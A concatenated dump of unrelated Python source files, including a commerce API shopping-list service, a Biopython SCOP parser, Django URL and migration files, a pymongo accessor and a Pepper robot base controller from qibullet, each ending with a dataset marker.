):
pass
class _ShoppingListUpdateSchema(traits.ExpandableSchema, traits.VersionedSchema):
pass
class _ShoppingListDeleteSchema(
traits.VersionedSchema, traits.ExpandableSchema, traits.DataErasureSchema
):
pass
class ShoppingListService(abstract.AbstractService):
"""shopping-lists e.
g. for wishlist support
"""
def get_by_id(self, id: str, *, expand: OptionalListStr = None) -> ShoppingList:
"""Gets a shopping list by ID."""
params = self._serialize_params({"expand": expand}, traits.ExpandableSchema)
return self._client._get(
endpoint=f"shopping-lists/{id}",
params=params,
schema_cls=ShoppingListSchema,
)
def get_by_key(self, key: str, *, expand: OptionalListStr = None) -> ShoppingList:
"""Gets a shopping list by Key."""
params = self._serialize_params({"expand": expand}, traits.ExpandableSchema)
return self._client._get(
endpoint=f"shopping-lists/key={key}",
params=params,
schema_cls=ShoppingListSchema,
)
def query(
self,
*,
expand: OptionalListStr = None,
sort: OptionalListStr = None,
limit: int = None,
offset: int = None,
with_total: bool = None,
where: OptionalListStr = None,
predicate_var: typing.Dict[str, str] = None,
) -> ShoppingListPagedQueryResponse:
"""shopping-lists e.g. for wishlist support
"""
params = self._serialize_params(
{
"expand": expand,
"sort": sort,
"limit": limit,
"offset": offset,
"withTotal": with_total,
"where": where,
"predicate_var": predicate_var,
},
_ShoppingListQuerySchema,
)
return self._client._get(
endpoint="shopping-lists",
params=params,
schema_cls=ShoppingListPagedQueryResponseSchema,
)
def create(
self, draft: ShoppingListDraft, *, expand: OptionalListStr = None
) -> ShoppingList:
"""shopping-lists e.g. for wishlist support
"""
params = self._serialize_params({"expand": expand}, traits.ExpandableSchema)
return self._client._post(
endpoint="shopping-lists",
params=params,
data_object=draft,
request_schema_cls=ShoppingListDraftSchema,
response_schema_cls=ShoppingListSchema,
)
def update_by_id(
self,
id: str,
version: int,
actions: typing.List[ShoppingListUpdateAction],
*,
expand: OptionalListStr = None,
force_update: bool = False,
) -> ShoppingList:
params = self._serialize_params({"expand": expand}, _ShoppingListUpdateSchema)
update_action = ShoppingListUpdate(version=version, actions=actions)
return self._client._post(
endpoint=f"shopping-lists/{id}",
params=params,
data_object=update_action,
request_schema_cls=ShoppingListUpdateSchema,
response_schema_cls=ShoppingListSchema,
force_update=force_update,
)
def update_by_key(
self,
key: str,
version: int,
actions: typing.List[ShoppingListUpdateAction],
*,
expand: OptionalListStr = None,
force_update: bool = False,
) -> ShoppingList:
"""Update a shopping list found by its Key."""
params = self._serialize_params({"expand": expand}, _ShoppingListUpdateSchema)
update_action = ShoppingListUpdate(version=version, actions=actions)
return self._client._post(
endpoint=f"shopping-lists/key={key}",
params=params,
data_object=update_action,
request_schema_cls=ShoppingListUpdateSchema,
response_schema_cls=ShoppingListSchema,
force_update=force_update,
)
def delete_by_id(
self,
id: str,
version: int,
*,
expand: OptionalListStr = None,
data_erasure: bool = None,
force_delete: bool = False,
) -> ShoppingList:
params = self._serialize_params(
{"version": version, "expand": expand, "dataErasure": data_erasure},
_ShoppingListDeleteSchema,
)
return self._client._delete(
endpoint=f"shopping-lists/{id}",
params=params,
response_schema_cls=ShoppingListSchema,
force_delete=force_delete,
)
def delete_by_key(
self,
key: str,
version: int,
*,
expand: OptionalListStr = None,
data_erasure: bool = None,
force_delete: bool = False,
) -> ShoppingList:
params = self._serialize_params(
{"version": version, "expand": expand, "dataErasure": data_erasure},
_ShoppingListDeleteSchema,
)
return self._client._delete(
endpoint=f"shopping-lists/key={key}",
params=params,
response_schema_cls=ShoppingListSchema,
force_delete=force_delete,
)
| StarcoderdataPython |
17018 | import logging
import os
import cltl.combot.infra.config.local as local_config
logger = logging.getLogger(__name__)
K8_CONFIG_DIR = "/cltl_k8_config"
K8_CONFIG = "config/k8.config"
class K8LocalConfigurationContainer(local_config.LocalConfigurationContainer):
@staticmethod
def load_configuration(config_file=local_config.CONFIG, additional_config_files=local_config.ADDITIONAL_CONFIGS,
k8_configs=K8_CONFIG_DIR, k8_config_file=K8_CONFIG):
configs = additional_config_files
try:
copy_k8_config(k8_configs, k8_config_file)
configs += [k8_config_file]
except OSError:
logger.warning("Could not load kubernetes config map from %s to %s", k8_configs, k8_config_file)
local_config.LocalConfigurationContainer.load_configuration(config_file, configs)
def copy_k8_config(k8_config_dir, k8_config_file):
k8_configs = tuple(file for file in os.listdir(k8_config_dir) if not file.startswith("."))
logger.debug("Found kubernetes config maps %s in %s", k8_configs, k8_config_dir)
k8_sections = {section: _read_config(k8_config_dir, section)
for section in k8_configs}
with open(k8_config_file, 'w') as k8_cfg:
logger.info("Writing %s", k8_cfg)
for section_name, section_values in k8_sections.items():
k8_cfg.write(f"[{section_name}]\n")
k8_cfg.write(section_values)
k8_cfg.write("\n")
def _read_config(k8_configs, config_file):
logger.info("Loading %s/%s", k8_configs, config_file)
with open(os.path.join(k8_configs, config_file)) as cfg:
return cfg.read() | StarcoderdataPython |
4827416 | # Copyright 2001 by <NAME>. All rights reserved.
# Modifications Copyright 2010 <NAME>. All rights reserved.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Handle the SCOP CLAssification file, which describes SCOP domains.
The file format is described in the scop
"release notes.":http://scop.mrc-lmb.cam.ac.uk/scop/release-notes.html
The latest CLA file can be found
"elsewhere at SCOP.":http://scop.mrc-lmb.cam.ac.uk/scop/parse/
"Release 1.73": http://scop.mrc-lmb.cam.ac.uk/scop/parse/dir.cla.scop.txt_1.73
(July 2008)
"""
from . import Residues
class Record(object):
"""Holds information for one SCOP domain.
Attributes:
- sid - SCOP identifier. e.g. d1danl2
- residues - The domain definition as a Residues object
- sccs - SCOP concise classification strings. e.g. b.1.2.1
- sunid - SCOP unique identifier for this domain
- hierarchy - A dictionary, keys are nodetype, values are sunid,
describing the location of this domain in the SCOP hierarchy. See
the Scop module for a description of nodetypes. This used to be a
list of (key,value) tuples in older versions of Biopython (see
Bug 3109).
"""
def __init__(self, line=None):
"""Initialize the class."""
self.sid = ''
self.residues = None
self.sccs = ''
self.sunid = ''
self.hierarchy = {}
if line:
self._process(line)
def _process(self, line):
line = line.rstrip() # no trailing whitespace
columns = line.split('\t') # separate the tab-delineated cols
if len(columns) != 6:
raise ValueError("I don't understand the format of %s" % line)
self.sid, pdbid, residues, self.sccs, self.sunid, hierarchy = columns
self.residues = Residues.Residues(residues)
self.residues.pdbid = pdbid
self.sunid = int(self.sunid)
for ht in hierarchy.split(","):
key, value = ht.split('=')
self.hierarchy[key] = int(value)
def __str__(self):
s = []
s.append(self.sid)
s += str(self.residues).split(" ")
s.append(self.sccs)
s.append(self.sunid)
s.append(','.join('='.join((key, str(value))) for key, value
in self.hierarchy.items()))
return "\t".join(map(str, s)) + "\n"
def parse(handle):
"""Iterates over a CLA file as Cla records for each line.
Arguments:
- handle - file-like object.
"""
for line in handle:
if line.startswith('#'):
continue
yield Record(line)
class Index(dict):
"""A CLA file indexed by SCOP identifiers for rapid random access."""
def __init__(self, filename):
"""Create CLA index.
Arguments:
- filename - The file to index
"""
dict.__init__(self)
self.filename = filename
with open(self.filename, "rU") as f:
position = 0
while True:
line = f.readline()
if not line:
break
if line.startswith('#'):
continue
record = Record(line)
key = record.sid
if key is not None:
self[key] = position
position = f.tell()
def __getitem__(self, key):
"""Return an item from the indexed file."""
position = dict.__getitem__(self, key)
with open(self.filename, "rU") as f:
f.seek(position)
line = f.readline()
record = Record(line)
return record
| StarcoderdataPython |
1743006 | import bson
from env import pymongo_env
class SinglePymongoDocument(object):
"""A database accessor for a single document."""
def __init__(self, doc_id=None, id_field=None, document=None, collection=None):
"""Initializes the SinglePymongoDocument.
The document with id 'doc_id' is used from the given 'collection'.
Args:
doc_id: The id of the document to use.
id_field: The name of the field to copy the id to if a new doc is created.
document: The document to initialize with if one does not exist.
collection: The database collection to use.
"""
# Use the default public database if no collection is specified.
if collection is None:
collection = pymongo_env.PUBLIC_DB['test_collection']
self._collection = collection
if document is None:
document = {}
doc_id = bson.objectid.ObjectId(str(doc_id))
if doc_id is None:
# Insert a new document.
result_id = collection.insert_one(document).inserted_id
self._doc = {'_id': result_id}
collection.update_one(self._doc, {'$set': {id_field: str(result_id)}})
else:
# Check if there already exists a document with 'doc_id'.
self._doc = {'_id': doc_id}
result = collection.find_one(self._doc)
if result is None:
# Create the document with the given id.
document_with_id = {
'_id': doc_id
}
document_with_id.update(document)
if id_field is not None:
document_with_id[id_field] = doc_id
collection.insert_one(document_with_id)
def UpdateDocument(self, update):
"""Updates the document with 'update' pymongo dict."""
return self._collection.update_one(self._doc, update)
def UpdateFields(self, update):
"""Updates the document with the field/valules in 'update'."""
return self._collection.update_one(self._doc, {'$set': update})
def GetDocument(self):
"""Returns the document."""
return self._collection.find_one(self._doc)
def ReplaceDocument(self, replacement):
"""Replaces the document with 'document'."""
return self._collection.replace_one(self._doc, replacement)
def DeleteDocument(self):
"""Deletes the document."""
return self._collection.find_one_and_delete(self._doc)
| StarcoderdataPython |
3346418 | <filename>desktop/core/ext-py/guppy-0.1.10/guppy/sets/__init__.py
#._cv_part guppy.sets
from setsc import BitSet # base bitset type
from setsc import ImmBitSet # immutable bitset type
from setsc import immbit # immutable bitset singleton constructor
from setsc import immbitrange # immutable bitset range constructor
from setsc import immbitset # immutable bitset constructor
from setsc import MutBitSet # mutable bitset
from setsc import NodeSet # base nodeset type
from setsc import ImmNodeSet # immmutable nodeset type
from setsc import MutNodeSet # mutable nodeset type
import copy_reg
from setsc import _bs
if hasattr(copy_reg, 'safe_constructors'): # < 2.3 version
copy_reg.safe_constructors[_bs] = 1
else:
# In at least Python 2.3.3, we have to set __module__;
# it didn't find it otherwise.
_bs.__module__ # Due to bug in Python version 2.3.3, we have to read it first..
_bs.__module__= 'guppy.sets' # ..to be able to set it.
del copy_reg
# Define some constructors.
# Constructor names are lower case.
# Some constructors are equal to types.
# But this connection depends on the implementation.
# So one may wish the user to not depend on this.
mutbitset = MutBitSet
immnodeset = ImmNodeSet
mutnodeset = MutNodeSet
def mutnodeset_union(iterable):
"Return a mutable nodeset which is the union of all nodesets in iterable."
set = mutnodeset()
for it in iterable:
set |= it
return set
def immnodeset_union(iterable, *args):
"Return an immmutable nodeset which is the union of all nodesets in iterable."
set = mutnodeset_union(iterable)
return immnodeset(set, *args)
def laxnodeset(v):
"""\
Return a nodeset with elements from the argument. If the argument is
already a nodeset, it self will be returned. Otherwise it will be
converted to a nodeset, that can be mutable or immutable depending on
what happens to be most effectively implemented."""
if not isinstance(v, NodeSet):
v = immnodeset(v)
return v
# Make attributes assignable by reading one;
# this is getting around a bug in Python 2.3.3
# and should be harmless in any version.
try:
mutnodeset()._hiding_tag_
except AttributeError:
pass
| StarcoderdataPython |
1754423 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" P1 tests for Scaling up Vm
"""
#Import Local Modules
import marvin
from marvin.cloudstackTestCase import *
from marvin.cloudstackAPI import *
from marvin.sshClient import SshClient
from marvin.lib.utils import *
from marvin.lib.base import *
from marvin.lib.common import *
from nose.plugins.attrib import attr
#Import System modules
import time
_multiprocess_shared_ = True
class TestResourceDetail(cloudstackTestCase):
@classmethod
def setUpClass(cls):
testClient = super(TestResourceDetail, cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.services = testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
domain = get_domain(cls.apiclient)
zone = get_zone(cls.apiclient, testClient.getZoneForTests())
cls.services['mode'] = zone.networktype
# Set Zones and disk offerings ??
# Create account, service offerings, vm.
cls.account = Account.create(
cls.apiclient,
cls.services["account"],
domainid=domain.id
)
cls.disk_offering = DiskOffering.create(
cls.apiclient,
cls.services["disk_offering"]
)
#create a volume
cls.volume = Volume.create(
cls.apiclient,
{ "diskname" : "ndm"},
zoneid=zone.id,
account=cls.account.name,
domainid=cls.account.domainid,
diskofferingid=cls.disk_offering.id
)
#how does it work ??
cls._cleanup = [
cls.volume,
cls.account
]
@classmethod
def tearDownClass(cls):
cls.apiclient = super(TestResourceDetail, cls).getClsTestClient().getApiClient()
cleanup_resources(cls.apiclient, cls._cleanup)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
def tearDown(self):
#Clean up, terminate the created ISOs
cleanup_resources(self.apiclient, self.cleanup)
return
@attr(tags = ["advanced", "xenserver"], required_hardware="false")
def test_01_updatevolumedetail(self):
"""Test volume detail
"""
# Validate the following
#remove detail
self.debug("Testing REMOVE volume detail Volume-ID: %s " % (
self.volume.id
))
cmd = removeResourceDetail.removeResourceDetailCmd()
cmd.resourcetype = "Volume"
cmd.resourceid = self.volume.id
self.apiclient.removeResourceDetail(cmd)
listResourceDetailCmd = listResourceDetails.listResourceDetailsCmd()
listResourceDetailCmd.resourceid = self.volume.id
listResourceDetailCmd.resourcetype = "Volume"
listResourceDetailResponse = self.apiclient.listResourceDetails(listResourceDetailCmd)
self.assertEqual(listResourceDetailResponse, None, "Check if the list API \
returns an empty response")
#TODO - add detail. Map as input
return
| StarcoderdataPython |
3236060 | <filename>categorical.py
import math
import pandas as pd
class CategoricalConverter:
"""
Create a categorical converter based on supplied values.
Parameters
----------
binary (boolean) : transform binary categoricals [True]
Attributes
----------
binary_length_ : size of each categorical in binary str format
sr_categorical_mapper : pd.Series of categorical
(with fit values as index)
Examples
--------
>>> cat_conv = CategoricalConverter(binary=False)
>>> cat_conv
CategoricalConverter(binary=False)
>>> cat_conv.fit(['T' 'K' '9' 'C' 'I'])
>>> cat_conv.transform(pd.DataFrame(
{'A': ['K', 'T', '9'], 'B': ['C', 'I', 'K']}))
A B
0 1 3
1 2 0
2 4 1
>>> cat_conv = CategoricalConverter(binary=True)
>>> cat_conv
CategoricalConverter(binary=True)
>>> cat_conv.fit(['T' 'K' '9' 'C' 'I'])
>>> cat_conv.transform(pd.DataFrame(
{'A': ['K', 'T', '9'], 'B': ['C', 'I', 'K']}))
A_0 A_1 A_2 B_0 B_1 B_2
0 0 0 1 0 1 1
1 0 1 0 0 0 0
2 1 0 0 0 0 1
"""
def __init__(self, binary=True):
self.values = None
self.binary = binary
self.binary_length_ = None
self.sr_categorical_mapper = None
def fit(self, values):
""" Create the categorical mapping
Args:
values: values to be mapped to categoricals
Returns:
None. Updates `self` parameters.
"""
# None will have categorical value of 0
self.values = [None] + list(dict.fromkeys(values))
# Integer categorical
codes = list(range(len(self.values)))
self.sr_categorical_mapper = pd.Series(codes, index=self.values)
# convert mapper to binary
if self.binary:
self.binary_length_ = math.ceil(math.log2(len(codes)))
self.sr_categorical_mapper = self.sr_categorical_mapper.apply(
lambda v: '{0:b}'.format(v).zfill(self.binary_length_))
def transform(self, df, cols=None, fillna=0):
""" Transforms a dataframe to categorical dataframe
Args:
df: the dataframe to tranform
Kwargs:
cols (list) : columns of the dataframe to transform
fillna (bool) : replacement for null
Return:
DataFrame with categorical
"""
# if cols not supplied use all columns
if not cols:
cols = df.columns
# work on a copy of the dataframe
_df = df[cols].copy()
df_new = pd.DataFrame(index=_df.index) # index is important
for col in cols:
log.info('processing column ... {}'.format(col))
col_categories = _df[col].map(self.sr_categorical_mapper)
if self.binary:
new_cols = ['{}_{}'.format(col, i) for i in range(
self.binary_length_)]
df_binary = pd.DataFrame(
col_categories.apply(
lambda v: list(map(int, list(str(v))))
if not pd.isnull(v) else [fillna]*self.binary_length_
).values.tolist(),
index=_df.index, # index is important
columns=new_cols)
df_new = df_new.join(
df_binary[df_binary.columns.difference(df_new.columns)])
else:
df_new.loc[:, col] = col_categories
return df_new
def fit_transform(self, values):
self.fit(values)
return self.transform(pd.DataFrame(values))
def __repr__(self):
return 'CategoricalConverter(binary={})'.format(self.binary)
| StarcoderdataPython |
1627963 | """User app."""
| StarcoderdataPython |
3339958 | <gh_stars>0
#!/usr/bin/env python3
import csv
import subprocess
def determine_distro():
global current_distro
from platform import system
assert system() == "Linux", "Non-Linux platforms are not supported"
if current_distro != None: # The distro is already known
return
current_distro = subprocess.check_output("hostnamectl | grep -E '^Operating System' | sed 's/.*://'", shell = True)
current_distro = current_distro.decode("utf-8")
current_distro = current_distro.lstrip().rstrip().lower()
assert len(current_distro) > 0
# NOTE: Values for current_distro have to be the same as in Packages.csv
if "ubuntu" in current_distro:
current_distro = "ubuntu"
elif "debian" in current_distro:
current_distro = "debian"
elif "arch" in current_distro:
current_distro = "arch"
elif "fedora" in current_distro:
current_distro = "fedora"
else:
assert False, "Distro not supported"
def grab_package_name(name: str):
global current_distro
determine_distro()
assert current_distro != None
with open('Packages.csv', newline='') as packages:
packages_reader = csv.DictReader(packages)
for row in packages_reader:
if str(row['global']) == name:
distro_package = str(row[current_distro])
print(distro_package)
return
current_distro = None
grab_package_name(input())
| StarcoderdataPython |
3326175 | <filename>je_editor/ui/ui_utils/editor_content/content_save.py
import json
import os
from pathlib import Path
from threading import Lock
from je_editor.utils.exception.je_editor_exceptions import JEditorContentFileException
cwd = os.getcwd()
lock = Lock()
editor_data = {
"last_file": None
}
def read_output_content():
"""
read the editor content
"""
try:
lock.acquire()
file_path = Path(cwd + "/je_editor_content.json")
if file_path.exists() and file_path.is_file():
with open(cwd + "/je_editor_content.json", "r+") as read_file:
return read_file.read()
except JEditorContentFileException:
raise JEditorContentFileException
finally:
lock.release()
def write_output_content():
"""
write the editor content
"""
try:
lock.acquire()
with open(cwd + "/je_editor_content.json", "w+") as file_to_write:
file_to_write.write(json.dumps(editor_data))
except JEditorContentFileException:
raise JEditorContentFileException
finally:
lock.release()
def save_content_and_quit(file):
"""
set content data and write
"""
editor_data["last_file"] = file
write_output_content()
def open_content_and_start():
"""
read data and set content
"""
temp_content = read_output_content()
if temp_content is not None:
editor_data["last_file"] = json.loads(temp_content).get("last_file")
return editor_data.get("last_file")
| StarcoderdataPython |
1706127 | <filename>src/blog/urls.py
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include
from posts.views import index, blog, post, search, category_search, contact, map, ranking
from decouple import config
urlpatterns = [
path(config('ADMIN_URL'), admin.site.urls),
path('', index),
path('blog/', blog, name='post_list'),
path('post/<id>', post, name = 'post_detail'),
path('search/', search, name = 'search'),
path('category_search/', category_search, name = 'category_search'),
path('contact/', contact, name='contact'),
path('map/', map, name="map"),
path('ranking/', ranking, name="ranking"),
path('tinymce/', include('tinymce.urls')),
path('accounts/', include('allauth.urls')),
path('accounts/profile/', blog, name='post_list')
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | StarcoderdataPython |
166148 | <gh_stars>0
# Generated by Django 2.2.10 on 2022-03-22 19:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('watch', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='notifications',
name='neighbourhood',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='watch.Neighbourhood'),
),
]
| StarcoderdataPython |
117923 | """
WSGI config for TeaRoom project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "TeaRoom.settings.production")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Set OS environmental variable HTTPS to on
os.environ['HTTPS'] = "on"
# os.environ['wsgi.url_scheme'] = 'https'
| StarcoderdataPython |
194356 | #!/usr/bin/env python
# stdlib
import sys, logging, os
from zipfile import ZipFile
# config import path
sys.path.append('/Users/david/dev/docxperiments')
# local modules
from docxperiments.pathutils import mkpath, ls
# set up logger
log_format = 'undx: %(message)s'
logging.basicConfig(level=logging.INFO, format=log_format)
logger = logging.getLogger(__name__)
def decompose(stage_path):
natural_docx_path = mkpath(stage_path, 'natural.docx')
destination_path = mkpath(stage_path, 'decomposed')
logger.info("DOCX: '{}'".format(natural_docx_path))
natural_archive = ZipFile(natural_docx_path)
logger.info("Decomposed dir: '{}'".format(destination_path))
natural_archive.extractall(destination_path)
extracted_file_paths = ls(destination_path)
logger.info("Extracted {} files".format(len(extracted_file_paths)))
logger.debug("Extracted {} files: {}".format(len(extracted_file_paths), extracted_file_paths))
def main():
args = sys.argv
if len(args) == 1:
stage_path = os.path.realpath(".")
else:
stage_path = os.path.realpath(args[1])
logger.info("Using '{}' for stage path".format(stage_path))
logger.info("Decomposing '{}'".format(stage_path))
decompose(stage_path)
if __name__ == '__main__':
main()
| StarcoderdataPython |
75322 | #!/usr/bin/env python
# coding: utf-8
import time
import atexit
import weakref
import pybullet
import threading
from qibullet.tools import *
from qibullet.controller import Controller
class BaseController(Controller):
"""
Class describing a robot base controller
"""
# _instances = set()
FRAME_WORLD = 1
FRAME_ROBOT = 2
def __init__(self, robot_model, physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
physicsClientId - The id of the simulated instance in which the
robot will be controlled
"""
Controller.__init__(self, robot_model, physicsClientId)
self.linear_velocity = 0
self.angular_velocity = 0
self.linear_acceleration = 0
self.angular_acceleration = 0
self.frame = BaseController.FRAME_ROBOT
self.pose_init = {}
self.pose_goal = {}
def _setGoal(self, x, y, theta, frame):
"""
INTERNAL METHOD, set the position of the goal to a specific frame.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
"""
self.goal = [x, y, theta]
self.frame = frame
def _updateGoal(self):
"""
INTERNAL METHOD, update the position of the goal.
"""
# get actual position in frame world
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
x, y, theta = self.goal
# pose x, y, z
pose_requested = [x, y, 0]
# orientation requested (euler)
orn_requested = [0, 0, theta]
# if we are in frame robot express the position in the frame world
if self.frame == BaseController.FRAME_ROBOT:
orn_euler = pybullet.getEulerFromQuaternion(actual_orn)
pose_requested = [
pose_requested[0] * math.cos(orn_euler[2])
- pose_requested[1] * math.sin(orn_euler[2])
+ actual_pos[0],
pose_requested[0] * math.sin(orn_euler[2])
+ pose_requested[1] * math.cos(orn_euler[2])
+ actual_pos[1],
0]
orn_requested = [
orn_euler[0],
orn_euler[1],
orn_euler[2] + theta]
self.pose_goal["position"] = pose_requested
self.pose_goal["orientation"] = orn_requested
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
self.linear_velocity = linear_velocity
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
self.angular_velocity = angular_velocity
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
self.linear_acceleration = linear_acceleration
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
self.angular_acceleration = angular_acceleration
class PepperBaseController(BaseController):
"""
Class describing a Pepper base controller
"""
MAX_LINEAR_VELOCITY = 0.55
MIN_LINEAR_VELOCITY = 0.1
MAX_ANGULAR_VELOCITY = 2.0
MIN_ANGULAR_VELOCITY = 0.3
MAX_LINEAR_ACCELERATION = 0.55
MIN_LINEAR_ACCELERATION = 0.1
MAX_ANGULAR_ACCELERATION = 3.0
MIN_ANGULAR_ACCELERATION = 0.1
def __init__(
self,
robot_model,
speed,
acceleration,
motion_constraint,
physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
speed - list containing the linear velocity and the angular
velocity values, in m/s
acceleration - list containing the linear acceleration and angular
acceleration values, in m/s^2
motion_constraint - the pybullet motion constraint applied on the
robot
physicsClientId - The id of the simulated instance in which Pepper
will be controlled
"""
BaseController.__init__(
self,
robot_model,
physicsClientId=physicsClientId)
# Set the different speeds and accelerations
self.setLinearVelocity(speed[0])
self._setAngularVelocity(speed[1])
self._setLinearAcceleration(acceleration[0])
self._setAngularAcceleration(acceleration[1])
# force applied in the movement
self.force = 100
# The robot will stop the movement with a precisio of 0.01 m and 0.02
# rads
self.linear_threshold = 0.01
self.angular_threshold = 0.02
self.motion_constraint = motion_constraint
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
if linear_velocity > PepperBaseController.MAX_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MAX_LINEAR_VELOCITY
elif linear_velocity < PepperBaseController.MIN_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MIN_LINEAR_VELOCITY
BaseController.setLinearVelocity(self, linear_velocity)
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
if angular_velocity > PepperBaseController.MAX_ANGULAR_VELOCITY:
angular_velocity = PepperBaseController.MAX_ANGULAR_VELOCITY
elif angular_velocity < PepperBaseController.MIN_ANGULAR_VELOCITY:
angular_velocity = PepperBaseController.MIN_ANGULAR_VELOCITY
BaseController._setAngularVelocity(self, angular_velocity)
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
if linear_acceleration > PepperBaseController.MAX_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MAX_LINEAR_ACCELERATION
elif linear_acceleration <\
PepperBaseController.MIN_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MIN_LINEAR_ACCELERATION
BaseController._setLinearAcceleration(self, linear_acceleration)
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
if angular_acceleration >\
PepperBaseController.MAX_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MAX_ANGULAR_ACCELERATION
elif angular_acceleration <\
PepperBaseController.MIN_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MIN_ANGULAR_ACCELERATION
BaseController._setAngularAcceleration(self, angular_acceleration)
def moveTo(self, x, y, theta, frame, _async=False):
"""
Move the robot in frame world or robot (FRAME_WORLD=1, FRAME_ROBOT=2).
This method can be called synchonously or asynchronously. In the
asynchronous mode, the function can be called when it's already
launched, this will update the goal of the motion.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
_async - The method is launched in async mode if True, in synch
mode if False (False by default)
"""
self._setGoal(x, y, theta, frame)
if self.module_process.isAlive():
if _async is False:
raise pybullet.error(
"Already a moveTo asynchronous. Can't "
"launch moveTo synchronous")
self._initProcess()
elif _async:
self.module_process = threading.Thread(target=self._moveToProcess)
self.module_process.start()
else:
self._moveToProcess()
def move(self, x, y, theta):
"""
Apply a speed on the robot's base.
Parameters:
x - Speed on the x axis, in m/s
y - Speed on the y axis, in m/s
theta - Rotational speed around the z axis, in rad/s
"""
# Kill any previous moveTo process running
self.moveTo(0, 0, 0, frame=BaseController.FRAME_ROBOT, _async=True)
# Bound the velocity. The max acceleration is not taken into account
# here, this is a potential improvment
if abs(x) > PepperBaseController.MAX_LINEAR_VELOCITY:
x = PepperBaseController.MAX_LINEAR_VELOCITY * (x/abs(x))
if abs(y) > PepperBaseController.MAX_LINEAR_VELOCITY:
y = PepperBaseController.MAX_LINEAR_VELOCITY * (y/abs(y))
if abs(theta) > PepperBaseController.MAX_ANGULAR_VELOCITY:
theta = PepperBaseController.MAX_ANGULAR_VELOCITY *\
(theta/abs(theta))
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_world_velocity = [
x * math.cos(actual_orn[2]) - y * math.sin(actual_orn[2]),
x * math.sin(actual_orn[2]) + y * math.cos(actual_orn[2]),
0]
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
linear_world_velocity,
[0, 0, theta],
physicsClientId=self.physics_client)
def stopMove(self):
"""
If an aynchronous moveTo has been launched, calling this method will
stop the asynchronous process. Calling this method is equivalent to
calling moveTo(0.0, 0.0, 0.0, BaseController.FRAME_ROBOT, _async=True)
"""
self.moveTo(0.0, 0.0, 0.0, BaseController.FRAME_ROBOT, _async=True)
def _updateConstraint(self):
"""
INTERNAL METHOD, update the robot's constraint.
"""
# Change the constraint to the requested position and orientation
pybullet.changeConstraint(
self.motion_constraint,
self.pose_goal["position"],
jointChildFrameOrientation=pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"]),
maxForce=self.force,
physicsClientId=self.physics_client)
def _initProcess(self):
"""
INTERNAL METHOD, initialize the motion process and all variables
needed.
"""
# Get actual position in frame world
self.pose_init["position"], self.pose_init["orientation"] =\
pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert pose_init orientation in orn_euler
self.pose_init["orientation"] = pybullet.getEulerFromQuaternion(
self.pose_init["orientation"]
)
self._updateGoal()
